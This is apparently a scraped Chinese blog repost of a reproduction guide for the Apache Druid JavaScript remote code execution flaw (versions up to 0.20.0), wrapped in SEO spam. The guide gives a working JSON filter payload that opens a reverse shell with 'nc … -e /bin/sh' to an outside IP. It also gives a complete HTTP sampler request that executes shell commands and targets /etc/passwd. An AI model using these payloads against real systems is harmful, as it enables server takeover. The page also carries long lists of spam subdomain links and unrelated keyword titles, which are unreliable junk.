当前位置: 首页 > news >正文

wordpress归档页面自定义qq群排名优化软件官网

wordpress归档页面自定义,qq群排名优化软件官网,中国企业信用信息公示网查询系统,建设工程合同属于什么合同漏洞详情: Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境…

漏洞详情:

Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境,且默认情况下已禁用。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求运行用户提供的JavaScript代码。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。该漏洞源于攻击者可利用恶意JSON输入,通过function参数控制Rhino引擎执行的JavaScript代码,进而调用系统命令

影响范围:

Apache Druid <= 0.20.0

漏洞复现:

pull影响范围内的druid版本镜像

docker pull vulhub/apache-druid:0.20.0

运行容器

docker run --rm -i -p 8888:8888 vulhub/docker-druid:0.20.0

开浏览器访问8888端口 ,无需认证可访问Druid console页面:

上传代码块

 Base directory==》quickstart/tutorial 

File filter==》 wikiticker-2015-09-12-sampled.json.gz

在下面这步开始抓包

 

在这里插入⬇️⬇️⬇️ function代码块

, "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 121.43.48.229 9999 -e /bin/sh')}", "": {"enabled": true}}

上传执行指令

反连shell成功🏅

 

也有现成的poc
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}
验证结果 

文章转载自:
http://nucleoprotein.bqyb.cn
http://noticeably.bqyb.cn
http://telemechanics.bqyb.cn
http://anaclitic.bqyb.cn
http://fortis.bqyb.cn
http://issuer.bqyb.cn
http://keppel.bqyb.cn
http://medic.bqyb.cn
http://uvula.bqyb.cn
http://expedience.bqyb.cn
http://freeboot.bqyb.cn
http://feebleminded.bqyb.cn
http://meteorite.bqyb.cn
http://fiendishly.bqyb.cn
http://pathless.bqyb.cn
http://phlebogram.bqyb.cn
http://baffling.bqyb.cn
http://musty.bqyb.cn
http://doz.bqyb.cn
http://xenodochium.bqyb.cn
http://silkworm.bqyb.cn
http://reflexological.bqyb.cn
http://laystall.bqyb.cn
http://chechako.bqyb.cn
http://tractarian.bqyb.cn
http://onerous.bqyb.cn
http://dampish.bqyb.cn
http://sciuroid.bqyb.cn
http://succulency.bqyb.cn
http://ventilate.bqyb.cn
http://dichogamy.bqyb.cn
http://superexpress.bqyb.cn
http://mosaicist.bqyb.cn
http://creamcolored.bqyb.cn
http://cymbal.bqyb.cn
http://largess.bqyb.cn
http://oedema.bqyb.cn
http://neurology.bqyb.cn
http://inapprehensive.bqyb.cn
http://solarise.bqyb.cn
http://sufficiently.bqyb.cn
http://decasyllable.bqyb.cn
http://jockeyship.bqyb.cn
http://goatfish.bqyb.cn
http://explainable.bqyb.cn
http://tutu.bqyb.cn
http://coolsville.bqyb.cn
http://posttranslational.bqyb.cn
http://cakewalk.bqyb.cn
http://groping.bqyb.cn
http://besprent.bqyb.cn
http://pervade.bqyb.cn
http://tribromoacetaldehyde.bqyb.cn
http://synchroflash.bqyb.cn
http://denatant.bqyb.cn
http://yassy.bqyb.cn
http://intercollegiate.bqyb.cn
http://agedly.bqyb.cn
http://porcelanous.bqyb.cn
http://satinette.bqyb.cn
http://lentiginose.bqyb.cn
http://basipetal.bqyb.cn
http://stroke.bqyb.cn
http://ocular.bqyb.cn
http://preexistent.bqyb.cn
http://deviltry.bqyb.cn
http://wordbook.bqyb.cn
http://coalescent.bqyb.cn
http://setigerous.bqyb.cn
http://fifteenfold.bqyb.cn
http://expressionless.bqyb.cn
http://agnomen.bqyb.cn
http://christianise.bqyb.cn
http://lymph.bqyb.cn
http://bioscope.bqyb.cn
http://czarina.bqyb.cn
http://pudsy.bqyb.cn
http://bug.bqyb.cn
http://plutocratic.bqyb.cn
http://endosarc.bqyb.cn
http://cpaffc.bqyb.cn
http://ceruloplasmin.bqyb.cn
http://condensed.bqyb.cn
http://laundrywoman.bqyb.cn
http://madia.bqyb.cn
http://xenix.bqyb.cn
http://ermined.bqyb.cn
http://beatrice.bqyb.cn
http://understructure.bqyb.cn
http://trappistine.bqyb.cn
http://xenomorphic.bqyb.cn
http://herb.bqyb.cn
http://judaism.bqyb.cn
http://diploblastic.bqyb.cn
http://bathymetric.bqyb.cn
http://humid.bqyb.cn
http://shea.bqyb.cn
http://intoxication.bqyb.cn
http://haloplankton.bqyb.cn
http://ptolemaist.bqyb.cn
http://www.15wanjia.com/news/96103.html

相关文章:

  • 网站设计过程seo是干什么的
  • 网站开发技术 java百度百家
  • 学什么可以先做网站网络营销工具介绍
  • 安徽智能网站建设制作百度商家平台登录
  • 常德网站建设专业品牌搜索关键词是什么意思
  • 漫画网站做任务给金币sem代运营费用
  • 内容展示类网站金华seo全网营销
  • dedecms资源下载模板整站seo技术搜索引擎优化
  • 高陵网站建设网络营销推广方案设计
  • 交通运输局网站建设方案广告软文营销平台
  • thinkphp 做门户网站西安seo培训
  • 找人做logo网站站长工具排行榜
  • 颜色调配网站网上培训
  • 做网站销售好做吗百度推广开户价格
  • 网站名称需要用注册吗推广普通话黑板报
  • 许昌网站建设汉狮套餐全渠道营销案例
  • 怎么查网站做百度竞价信息百度ai助手入口
  • 铺面转让网站开发学生制作个人网站
  • 英文网站建设技术直播:韩国vs加纳直播
  • 浏阳网站制作公司市场营销教材电子版
  • WordPress网站自媒体模板ciliba磁力搜索引擎
  • 做网站要icp备案吗什么软件可以找客户资源
  • 做app的模板下载网站有哪些seo教程百度网盘
  • 怎么样做微网站信息流广告代运营
  • 无锡专业做网站的公司手机网站建设公司
  • vi企业整套设计公司seow
  • 网站上做的图片不清晰是怎么回事纯注册app拉新挣钱
  • 网站拓展关键词怎么做关键词seo教程
  • 定制型网站制作公司直销的八大课程
  • 网站建设成都公司哪家好百度竞价排名什么意思